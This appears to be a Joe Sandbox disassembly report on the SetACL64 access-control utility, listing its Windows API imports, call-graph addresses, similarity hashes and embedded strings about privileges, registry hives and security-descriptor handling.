Security descriptors and SIDs: CreateFileW, GetKernelObjectSecurity, GetNamedSecurityInfoW, MakeAbsoluteSD, IsValidSid, GetLengthSid, CopySid, IsValidSecurityDescriptor, LocalFree
Event log and host identity: RegisterEventSourceW, DeregisterEventSource, GetUserNameExW, GetModuleFileNameW, GetSystemTimeAsFileTime, GetCurrentThreadId
Startup and synchronization: WSAStartup, CreateMutexW, CreateEventW, InitializeCriticalSection, TlsAlloc, EnterCriticalSection, LeaveCriticalSection, WaitForSingleObject, ReleaseMutex, ResetEvent, ExitThread, FreeLibraryAndExitThread
Dynamic import resolution (inside the CRT's try_get_function): LoadLibraryW, LoadLibraryExW, GetProcAddress, FreeLibrary
Process, heap and CRT error paths: TerminateProcess, RtlAllocateHeap, HeapFree, WideCharToMultiByte, GetStdHandle, GetFileType, SetLastError, RtlPcToFileHeader, RaiseException, together with the CRT helpers _invalid_parameter_noinfo_noreturn, _handle_error and the __scrt_* startup routines
7ff7c174e66f CreateThread 42970 7ff7c174e6ac 42968->42970 42971 7ff7c174e69f GetLastError 42968->42971 42969 7ff7c171cfd9 42969->42928 42978 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42969->42978 42970->42969 42973 7ff7c174e6bc CloseHandle 42970->42973 42974 7ff7c174e6c2 42970->42974 42988 7ff7c174e188 14 API calls 2 library calls 42971->42988 42973->42974 42975 7ff7c174e6cb FreeLibrary 42974->42975 42976 7ff7c174e6d1 42974->42976 42975->42976 42977 7ff7c1755054 __free_lconv_num 14 API calls 42976->42977 42977->42969 42978->42928 42980 7ff7c1754fdc _invalid_parameter_noinfo 14 API calls 42979->42980 42981 7ff7c174e5ee 42980->42981 42982 7ff7c1755054 __free_lconv_num 14 API calls 42981->42982 42983 7ff7c174e5f8 42982->42983 42984 7ff7c174e619 42983->42984 42985 7ff7c174e5ff GetModuleHandleExW 42983->42985 42984->42968 42984->42970 42985->42984 42986->42965 42987->42969 42988->42970 42989 7ff7c1722dcb 42990 7ff7c1722dd9 42989->42990 42991 7ff7c172346c 42989->42991 42992 7ff7c1722de7 42990->42992 42993 7ff7c1723481 42990->42993 43146 7ff7c1744c18 RtlPcToFileHeader RaiseException 42991->43146 42995 7ff7c1722e03 42992->42995 43134 7ff7c1727b10 154 API calls 6 library calls 42992->43134 43147 7ff7c1744c18 RtlPcToFileHeader RaiseException 42993->43147 43000 7ff7c1722e4f 42995->43000 43001 7ff7c1722e34 42995->43001 43005 7ff7c1722e90 42995->43005 42998 7ff7c172349a 43148 7ff7c1744c18 RtlPcToFileHeader RaiseException 42998->43148 43006 7ff7c1722e6f 43000->43006 43007 7ff7c1722e54 43000->43007 43004 7ff7c1709520 35 API calls 43001->43004 43002 7ff7c1722df5 43002->42995 43002->42998 43003 7ff7c17234af 43149 7ff7c1744c18 RtlPcToFileHeader RaiseException 43003->43149 43010 7ff7c1722e39 43004->43010 43018 7ff7c17231dc 43005->43018 43028 7ff7c1722f4f 43005->43028 43136 7ff7c17341a0 35 API calls 2 library calls 43005->43136 43008 7ff7c1709520 35 API calls 43006->43008 43011 7ff7c1709520 35 API calls 43007->43011 43012 7ff7c1722e74 43008->43012 43135 7ff7c17296d0 78 API 
calls 3 library calls 43010->43135 43016 7ff7c1722e59 43011->43016 43017 7ff7c172bc40 244 API calls 43012->43017 43013 7ff7c17234c4 43150 7ff7c1744c18 RtlPcToFileHeader RaiseException 43013->43150 43014 7ff7c172331f 43021 7ff7c1713f80 35 API calls 43014->43021 43022 7ff7c172b710 258 API calls 43016->43022 43023 7ff7c1722e6b 43017->43023 43018->43014 43025 7ff7c172320e 43018->43025 43141 7ff7c175de6c 64 API calls 2 library calls 43018->43141 43019 7ff7c1722e4b 43019->43023 43027 7ff7c1723339 43021->43027 43022->43023 43023->43003 43023->43005 43031 7ff7c1709520 35 API calls 43025->43031 43026 7ff7c1722f27 43137 7ff7c1735f60 40 API calls 43026->43137 43033 7ff7c1713f80 35 API calls 43027->43033 43034 7ff7c1722fe1 43028->43034 43035 7ff7c1723054 43028->43035 43029 7ff7c17234da 43037 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43029->43037 43036 7ff7c1723222 43031->43036 43059 7ff7c1723389 43033->43059 43038 7ff7c172300e 43034->43038 43039 7ff7c1722ff3 43034->43039 43040 7ff7c1713f80 35 API calls 43035->43040 43041 7ff7c1723271 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43036->43041 43055 7ff7c17234e6 43036->43055 43043 7ff7c17234e0 43037->43043 43046 7ff7c172302e 43038->43046 43047 7ff7c1723013 43038->43047 43044 7ff7c1709520 35 API calls 43039->43044 43045 7ff7c172308a 43040->43045 43042 7ff7c1723287 43041->43042 43142 7ff7c173e1c0 94 API calls 4 library calls 43041->43142 43051 7ff7c17232ce 43042->43051 43052 7ff7c17232b3 43042->43052 43069 7ff7c172328b 43042->43069 43061 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43043->43061 43053 7ff7c1722ff8 43044->43053 43054 7ff7c1713f80 35 API calls 43045->43054 43050 7ff7c1709520 35 API calls 43046->43050 43048 7ff7c1709520 35 API calls 43047->43048 43056 7ff7c1723018 43048->43056 43057 7ff7c1723033 43050->43057 43062 7ff7c17232ee 43051->43062 43063 7ff7c17232d3 43051->43063 43058 7ff7c1709520 35 API calls 43052->43058 43138 7ff7c17296d0 78 API calls 3 library calls 
43053->43138 43084 7ff7c17230c9 43054->43084 43065 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43055->43065 43067 7ff7c172b710 258 API calls 43056->43067 43070 7ff7c172bc40 244 API calls 43057->43070 43071 7ff7c17232b8 43058->43071 43060 7ff7c17233ee Concurrency::details::platform::DefaultWaiterPool::get_waiter 43059->43060 43078 7ff7c1723502 43059->43078 43066 7ff7c1723437 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43060->43066 43080 7ff7c1723508 43060->43080 43061->43055 43068 7ff7c1709520 35 API calls 43062->43068 43072 7ff7c1709520 35 API calls 43063->43072 43065->43069 43076 7ff7c1742180 _handle_error 8 API calls 43066->43076 43074 7ff7c172302a 43067->43074 43075 7ff7c17232f3 43068->43075 43151 7ff7c1744c18 RtlPcToFileHeader RaiseException 43069->43151 43070->43074 43143 7ff7c17296d0 78 API calls 3 library calls 43071->43143 43079 7ff7c17232d8 43072->43079 43073 7ff7c172300a 43073->43074 43074->43013 43093 7ff7c172304f Concurrency::details::platform::DefaultWaiterPool::get_waiter 43074->43093 43144 7ff7c172e530 177 API calls 6 library calls 43075->43144 43082 7ff7c172344f 43076->43082 43086 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43078->43086 43088 7ff7c172b710 258 API calls 43079->43088 43090 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43080->43090 43084->43029 43085 7ff7c1723130 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43084->43085 43085->43043 43085->43093 43086->43080 43087 7ff7c17232ca 43089 7ff7c17232ea 43087->43089 43088->43089 43091 7ff7c1723310 43089->43091 43145 7ff7c175de6c 64 API calls 2 library calls 43089->43145 43092 7ff7c172350e 43090->43092 43091->43014 43091->43069 43098 7ff7c1713f80 35 API calls 43092->43098 43094 7ff7c17231c8 43093->43094 43139 7ff7c1736010 41 API calls 2 library calls 43093->43139 43140 7ff7c17340e0 31 API calls 2 library calls 43094->43140 43099 7ff7c1723584 43098->43099 43100 7ff7c1713f80 35 API calls 43099->43100 43101 
7ff7c17235b2 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43100->43101 43102 7ff7c17243e2 43101->43102 43103 7ff7c172371c Concurrency::details::platform::DefaultWaiterPool::get_waiter 43101->43103 43105 7ff7c17243dd 43101->43105 43104 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43102->43104 43106 7ff7c1742180 _handle_error 8 API calls 43103->43106 43107 7ff7c17243e8 43104->43107 43109 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43105->43109 43108 7ff7c17243c0 43106->43108 43110 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43107->43110 43109->43102 43111 7ff7c17243ee 43110->43111 43112 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43111->43112 43113 7ff7c17243f4 43112->43113 43114 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43113->43114 43115 7ff7c17243fa 43114->43115 43116 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43115->43116 43117 7ff7c1724400 43116->43117 43118 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43117->43118 43119 7ff7c1724406 43118->43119 43120 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43119->43120 43121 7ff7c172440c 43120->43121 43122 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43121->43122 43123 7ff7c1724412 43122->43123 43124 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43123->43124 43125 7ff7c1724418 43124->43125 43126 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43125->43126 43127 7ff7c172441e 43126->43127 43128 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43127->43128 43129 7ff7c1724424 43128->43129 43130 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43129->43130 43131 7ff7c172442a 43130->43131 43132 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43131->43132 43133 7ff7c1724430 43132->43133 43134->43002 43135->43019 43136->43026 43137->43028 43138->43073 43139->43094 43140->43018 43141->43025 
43142->43042 43143->43087 43144->43089 43145->43091 43146->42993 43147->42998 43148->43003 43149->43013 43150->43029 43151->43078 43152 7ff7c1752ff4 43153 7ff7c175305b 43152->43153 43154 7ff7c1753011 GetModuleHandleW 43152->43154 43162 7ff7c1752eec 43153->43162 43154->43153 43156 7ff7c175301e 43154->43156 43156->43153 43176 7ff7c17530fc GetModuleHandleExW 43156->43176 43158 7ff7c175309d 43160 7ff7c17530af 43182 7ff7c174f264 EnterCriticalSection 43162->43182 43164 7ff7c1752f08 43165 7ff7c1752f24 57 API calls 43164->43165 43166 7ff7c1752f11 43165->43166 43167 7ff7c174f2b8 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 43166->43167 43168 7ff7c1752f19 43167->43168 43168->43158 43169 7ff7c17530b0 43168->43169 43183 7ff7c175aa24 43169->43183 43172 7ff7c17530ea 43173 7ff7c17530fc 3 API calls 43172->43173 43175 7ff7c17530f1 ExitProcess 43173->43175 43174 7ff7c17530d9 GetCurrentProcess TerminateProcess 43174->43172 43177 7ff7c1753141 43176->43177 43178 7ff7c1753122 GetProcAddress 43176->43178 43180 7ff7c175314b FreeLibrary 43177->43180 43181 7ff7c1753151 43177->43181 43178->43177 43179 7ff7c1753139 43178->43179 43179->43177 43180->43181 43181->43153 43184 7ff7c17530bd 43183->43184 43185 7ff7c175aa42 43183->43185 43184->43172 43184->43174 43187 7ff7c1757b70 5 API calls try_get_function 43185->43187 43187->43184 43188 7ff7c1737715 43189 7ff7c173771f 43188->43189 43190 7ff7c1737ef0 43188->43190 43192 7ff7c173772c 43189->43192 43193 7ff7c17379d1 43189->43193 43290 7ff7c1736970 33 API calls 4 library calls 43190->43290 43194 7ff7c1713f80 35 API calls 43192->43194 43196 7ff7c1737bb6 43193->43196 43197 7ff7c17379e3 43193->43197 43201 7ff7c1737a48 43193->43201 43195 7ff7c1737759 43194->43195 43198 7ff7c1713f80 35 API calls 43195->43198 43196->43201 43206 7ff7c172a350 258 API calls 43196->43206 43199 7ff7c17379ed 43197->43199 43200 7ff7c17379f0 CreateFileW 43197->43200 43203 7ff7c1737790 43198->43203 43199->43200 43204 7ff7c1737a29 43200->43204 43205 7ff7c1737a35 GetLastError 
43200->43205 43207 7ff7c1709520 35 API calls 43201->43207 43276 7ff7c1737a86 ctype 43201->43276 43202 7ff7c1737f82 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43217 7ff7c173765d Concurrency::details::platform::DefaultWaiterPool::get_waiter 43202->43217 43218 7ff7c1737fe1 43202->43218 43280 7ff7c17142a0 58 API calls 3 library calls 43203->43280 43210 7ff7c1737c03 SetSecurityInfo 43204->43210 43205->43201 43215 7ff7c1737bdc 43206->43215 43211 7ff7c1737a66 43207->43211 43208 7ff7c1737ef9 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43208->43202 43209 7ff7c1737fdc 43208->43209 43268 7ff7c1738005 43208->43268 43219 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43209->43219 43210->43201 43222 7ff7c1737b3d 43210->43222 43282 7ff7c17150c0 72 API calls 3 library calls 43211->43282 43212 7ff7c1737b33 43221 7ff7c1737e16 SetNamedSecurityInfoW 43212->43221 43212->43222 43227 7ff7c1737cd9 43212->43227 43228 7ff7c1737d05 43212->43228 43214 7ff7c1737af9 43214->43212 43214->43222 43284 7ff7c1739fb0 16 API calls _handle_error 43214->43284 43215->43201 43215->43210 43216 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43223 7ff7c173800b 43216->43223 43230 7ff7c1737fe7 43217->43230 43279 7ff7c17376aa Concurrency::details::platform::DefaultWaiterPool::get_waiter ctype 43217->43279 43224 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43218->43224 43219->43218 43221->43222 43234 7ff7c1737e78 43221->43234 43231 7ff7c1737b58 43222->43231 43232 7ff7c1737b4f CloseHandle 43222->43232 43224->43230 43225 7ff7c1737a75 43243 7ff7c1709520 35 API calls 43225->43243 43225->43276 43255 7ff7c1713f80 35 API calls 43227->43255 43269 7ff7c1737d00 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43227->43269 43235 7ff7c1737ff9 43228->43235 43236 7ff7c1737d2b 43228->43236 43233 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43230->43233 43239 7ff7c1737b6d 43231->43239 43240 7ff7c1737b62 RegCloseKey 
43231->43240 43232->43231 43242 7ff7c1737fed 43233->43242 43234->43222 43254 7ff7c1737ec8 NetShareSetInfo 43234->43254 43244 7ff7c1709910 33 API calls 43235->43244 43257 7ff7c1713f80 35 API calls 43236->43257 43238 7ff7c1737dcb NetShareGetInfo 43249 7ff7c1737de2 43238->43249 43250 7ff7c1737e06 43238->43250 43285 7ff7c1736970 33 API calls 4 library calls 43239->43285 43240->43239 43241 7ff7c1742180 _handle_error 8 API calls 43252 7ff7c17376f8 43241->43252 43253 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43242->43253 43243->43276 43256 7ff7c1737fff 43244->43256 43245 7ff7c17377a4 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43245->43242 43246 7ff7c1737857 43245->43246 43247 7ff7c17379cd 43245->43247 43258 7ff7c1737ff3 43245->43258 43281 7ff7c1736970 33 API calls 4 library calls 43246->43281 43247->43193 43266 7ff7c1713f80 35 API calls 43249->43266 43250->43221 43260 7ff7c1737e10 NetApiBufferFree 43250->43260 43253->43258 43254->43222 43255->43269 43264 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43256->43264 43262 7ff7c1737d52 43257->43262 43261 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43258->43261 43259 7ff7c1737b76 43286 7ff7c1714230 31 API calls 2 library calls 43259->43286 43260->43221 43261->43235 43262->43256 43262->43269 43264->43268 43265 7ff7c17378ee Concurrency::details::platform::DefaultWaiterPool::get_waiter 43265->43218 43272 7ff7c173793e Concurrency::details::platform::DefaultWaiterPool::get_waiter 43265->43272 43266->43250 43267 7ff7c1737b80 43287 7ff7c1714230 31 API calls 2 library calls 43267->43287 43268->43216 43269->43238 43270 7ff7c1737860 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43270->43209 43270->43265 43270->43268 43272->43230 43278 7ff7c173798a Concurrency::details::platform::DefaultWaiterPool::get_waiter ctype 43272->43278 43273 7ff7c1737b8a 43288 7ff7c1714230 31 API calls 2 library calls 43273->43288 43275 7ff7c1737b94 43289 7ff7c1714230 31 API 
calls 2 library calls 43275->43289 43276->43212 43276->43214 43283 7ff7c1739fb0 16 API calls _handle_error 43276->43283 43278->43279 43279->43241 43280->43245 43281->43270 43282->43225 43283->43214 43284->43212 43285->43259 43286->43267 43287->43273 43288->43275 43289->43279 43290->43208
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$Information$Delete$Valid$FreeLocal$CopyLength
• String ID: > because a filter keyword matched.$> failed with: $Omitting ACL of: <$Processing ACL of: <$Reading the SD from <$SetEntriesInAcl for DACL of <$SetEntriesInAcl for SACL of <$Write2SD$Writing SD to <
• API String ID: 3366768055-1688761767
• Opcode ID: 8c702df0ce635fb3871e4a0553cb4715271af5242ae0ef260948fefd7f14e07d
• Instruction ID: 184d0a05e9c608dc038ae5c86e2532ec0fdf160d6081a258b27a17f66ffb8907
• Opcode Fuzzy Hash: 8c702df0ce635fb3871e4a0553cb4715271af5242ae0ef260948fefd7f14e07d
• Instruction Fuzzy Hash: D733E272A1878285EB20EF26D8447EDA3A1FB497A4F804131DA5D47BDADFBCE585C310
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$Close$EnumLockitSimpleString::operator=std::_$ConnectCreateLockit::_Lockit::~_OpenRegistrySetgloballocalestd::locale::_
• String ID: RegKeyFixPathAndOpen$Unintentionally the following registry key was created: <$classes_root$current_user$hkcr$hkcu$hkey_classes_root$hkey_current_user$hkey_local_machine$hkey_users$hklm$hku$machine$users
• API String ID: 2754268630-3593729730
• Opcode ID: 706d74c401a7eba7e1d9deaebb3a5822d64d4f896357cd9c5b521f9506353fbc
• Instruction ID: d7c45289fadb91d4506b982c6d8fb25b431a50ad90e9958d8f525fba19bf132d
• Opcode Fuzzy Hash: 706d74c401a7eba7e1d9deaebb3a5822d64d4f896357cd9c5b521f9506353fbc
• Instruction Fuzzy Hash: 22F2B122B09B42C5EF10EF66D4402BDA3A1FB88BA4F954135DA4E07B9ADFBCD545C360
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$ErrorLastSecurity$Valid$AbsoluteCloseKernelMakeObject$CreateDescriptorFileFreeHandleInfoLocalNamed
• String ID: SeSecurityPrivilege
• API String ID: 3247214862-2333288578
• Opcode ID: 054ea4d1a2d6c0b3adbe8e4b57b4ca5633b3a582fabd17bd529d99db77766a5b
• Instruction ID: c4d16990089a1e9978aaf8a4d3ef57f9d45dbf2172b3914dac22a36576166efb
• Opcode Fuzzy Hash: 054ea4d1a2d6c0b3adbe8e4b57b4ca5633b3a582fabd17bd529d99db77766a5b
• Instruction Fuzzy Hash: EE42A072B1874286FB14EF26D44436DA3A1FB48BA8FC04135DA4C57A9ADFBCE561C360

Control-flow Graph
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
Similarity
• API ID: ErrorLast$CloseProcessToken$AdjustChangeCurrentFindHandleNotificationOpenPrivileges
• String ID: Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeRestorePrivilege$SeTakeOwnershipPrivilege
• API String ID: 596220290-1541018277
• Opcode ID: 784cef284bd62b761dc482660273cd6918b6e7e394081ec7e667ddc71951a65c
• Instruction ID: ac90694353ef193aec2b6cceb0f84730b87cee635175ebcca07711e85a17869f
• Opcode Fuzzy Hash: 784cef284bd62b761dc482660273cd6918b6e7e394081ec7e667ddc71951a65c
• Instruction Fuzzy Hash: 3622A472B1878281EB04DF56E444369A361FB897F4F905135EA9D43AEADFBCE085C710

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2657 7ff7c173e4b0-7ff7c173e4f4 2658 7ff7c173e4ff-7ff7c173e507 2657->2658 2659 7ff7c173e4f6-7ff7c173e4fb call 7ff7c174d6ac 2657->2659 2660 7ff7c173e509 2658->2660 2661 7ff7c173e50c-7ff7c173e519 ConvertStringSidToSidW 2658->2661 2659->2658 2660->2661 2663 7ff7c173e53b-7ff7c173e574 2661->2663 2664 7ff7c173e51b-7ff7c173e536 call 7ff7c173ec20 LocalFree 2661->2664 2667 7ff7c173e579-7ff7c173e583 2663->2667 2668 7ff7c173e576 2663->2668 2672 7ff7c173ebc8-7ff7c173ebee call 7ff7c1742180 2664->2672 2670 7ff7c173e589-7ff7c173e597 2667->2670 2671 7ff7c173e6fd-7ff7c173e708 call 7ff7c173f9c0 2667->2671 2668->2667 2674 7ff7c173e599 2670->2674 2675 7ff7c173e5b3 2670->2675 2681 7ff7c173e70a-7ff7c173e71c 2671->2681 2682 7ff7c173e720-7ff7c173e762 call 7ff7c1713f80 call 7ff7c1714750 2671->2682 2678 7ff7c173e5a0-7ff7c173e5a4 2674->2678 2679 7ff7c173e5b6-7ff7c173e5b9 2675->2679 2678->2679 2683 7ff7c173e5a6-7ff7c173e5b1 2678->2683 2679->2671 2684 7ff7c173e5bf-7ff7c173e5c8 2679->2684 2681->2682 2703 7ff7c173e79a-7ff7c173e7b0 2682->2703 2704 7ff7c173e764-7ff7c173e77a 2682->2704 2683->2675 2683->2678 2684->2671 2686 7ff7c173e5ce-7ff7c173e5d5 2684->2686 2687 7ff7c173e5d7-7ff7c173e5dc 2686->2687 2688 7ff7c173e5e1-7ff7c173e602 2686->2688 2690 7ff7c173eb3d-7ff7c173eb41 2687->2690 2691 7ff7c173e607-7ff7c173e618 call 7ff7c1713f80 2688->2691 2692 7ff7c173e604 2688->2692 2695 7ff7c173eb7d-7ff7c173eb92 2690->2695 2696 7ff7c173eb43-7ff7c173eb59 2690->2696 2707 7ff7c173e61a-7ff7c173e630 2691->2707 2708 7ff7c173e650-7ff7c173e67a 2691->2708 2692->2691 2701 7ff7c173ebc6 2695->2701 2702 7ff7c173eb94-7ff7c173ebaa 2695->2702 2699 7ff7c173eb5b-7ff7c173eb6e 2696->2699 2700 7ff7c173eb74-7ff7c173eb79 call 7ff7c17421a0 2696->2700 2699->2700 2709 7ff7c173ec19-7ff7c173ec1f call 7ff7c17488fc 2699->2709 2700->2695 2701->2672 2711 7ff7c173ebac-7ff7c173ebbf 2702->2711 2712 7ff7c173ebc1 call 7ff7c17421a0 2702->2712 2705 7ff7c173e7f2 2703->2705 2706 
7ff7c173e7b2-7ff7c173e7eb call 7ff7c1740c18 call 7ff7c1715cf0 2703->2706 2713 7ff7c173e77c-7ff7c173e78f 2704->2713 2714 7ff7c173e795 call 7ff7c17421a0 2704->2714 2724 7ff7c173e7f6 2705->2724 2706->2724 2769 7ff7c173e7ed-7ff7c173e7f0 2706->2769 2718 7ff7c173e64b call 7ff7c17421a0 2707->2718 2719 7ff7c173e632-7ff7c173e645 2707->2719 2722 7ff7c173e680-7ff7c173e695 2708->2722 2723 7ff7c173ebf5-7ff7c173ebfa call 7ff7c1709910 2708->2723 2711->2712 2725 7ff7c173ebef-7ff7c173ebf4 call 7ff7c17488fc 2711->2725 2712->2701 2713->2714 2715 7ff7c173ebfb-7ff7c173ec00 call 7ff7c17488fc 2713->2715 2714->2703 2748 7ff7c173ec01-7ff7c173ec06 call 7ff7c17488fc 2715->2748 2718->2708 2719->2718 2729 7ff7c173ec13-7ff7c173ec18 call 7ff7c17488fc 2719->2729 2734 7ff7c173e69a-7ff7c173e6b5 call 7ff7c1713f80 2722->2734 2735 7ff7c173e697 2722->2735 2723->2715 2736 7ff7c173e7f9-7ff7c173e7fd 2724->2736 2725->2723 2729->2709 2751 7ff7c173e6b7-7ff7c173e6cd 2734->2751 2752 7ff7c173e6ed-7ff7c173e6f9 2734->2752 2735->2734 2742 7ff7c173e7ff-7ff7c173e802 2736->2742 2743 7ff7c173e823-7ff7c173e826 2736->2743 2742->2743 2750 7ff7c173e804-7ff7c173e810 2742->2750 2744 7ff7c173e82c-7ff7c173e875 call 7ff7c1709520 * 2 2743->2744 2745 7ff7c173e9c4 2743->2745 2775 7ff7c173e87a-7ff7c173e89c DsGetDcNameW 2744->2775 2776 7ff7c173e877 2744->2776 2754 7ff7c173e9c7-7ff7c173e9ea call 7ff7c173f3c0 2745->2754 2764 7ff7c173ec07-7ff7c173ec0c call 7ff7c17488fc 2748->2764 2750->2743 2765 7ff7c173e812-7ff7c173e81d 2750->2765 2757 7ff7c173e6e8 call 7ff7c17421a0 2751->2757 2758 7ff7c173e6cf-7ff7c173e6e2 2751->2758 2752->2671 2768 7ff7c173e9ef-7ff7c173e9f5 2754->2768 2757->2752 2758->2729 2758->2757 2783 7ff7c173ec0d-7ff7c173ec12 call 7ff7c17488fc 2764->2783 2765->2743 2772 7ff7c173e9fb-7ff7c173ea00 2768->2772 2773 7ff7c173eaa3-7ff7c173eaab 2768->2773 2769->2736 2779 7ff7c173ea1d-7ff7c173ea22 2772->2779 2780 7ff7c173ea02-7ff7c173ea18 call 7ff7c173f3c0 2772->2780 2777 7ff7c173eaad-7ff7c173eac3 2773->2777 2778 
7ff7c173eae4-7ff7c173eaec 2773->2778 2786 7ff7c173e89e-7ff7c173e8a3 2775->2786 2787 7ff7c173e912-7ff7c173e91a 2775->2787 2776->2775 2784 7ff7c173eade-7ff7c173eae3 call 7ff7c17421a0 2777->2784 2785 7ff7c173eac5-7ff7c173ead8 2777->2785 2781 7ff7c173eaee-7ff7c173eb04 2778->2781 2782 7ff7c173eb24-7ff7c173eb39 2778->2782 2779->2773 2789 7ff7c173ea24-7ff7c173ea6a call 7ff7c1713f80 call 7ff7c173f3c0 2779->2789 2780->2773 2791 7ff7c173eb1f call 7ff7c17421a0 2781->2791 2792 7ff7c173eb06-7ff7c173eb19 2781->2792 2782->2690 2783->2729 2784->2778 2785->2783 2785->2784 2797 7ff7c173e8a6-7ff7c173e8ae 2786->2797 2794 7ff7c173e91c-7ff7c173e92e 2787->2794 2795 7ff7c173e951-7ff7c173e964 2787->2795 2789->2773 2821 7ff7c173ea6c-7ff7c173ea82 2789->2821 2791->2782 2792->2729 2792->2791 2802 7ff7c173e94c call 7ff7c17421a0 2794->2802 2803 7ff7c173e930-7ff7c173e943 2794->2803 2804 7ff7c173e982-7ff7c173e98a 2795->2804 2805 7ff7c173e966-7ff7c173e981 call 7ff7c1713f80 2795->2805 2797->2797 2807 7ff7c173e8b0-7ff7c173e909 call 7ff7c1713f80 call 7ff7c170fe30 call 7ff7c171eaf0 2797->2807 2802->2795 2803->2748 2810 7ff7c173e949 2803->2810 2804->2754 2808 7ff7c173e98c-7ff7c173e9a2 2804->2808 2805->2804 2807->2787 2830 7ff7c173e90b-7ff7c173e911 NetApiBufferFree 2807->2830 2815 7ff7c173e9bd-7ff7c173e9c2 call 7ff7c17421a0 2808->2815 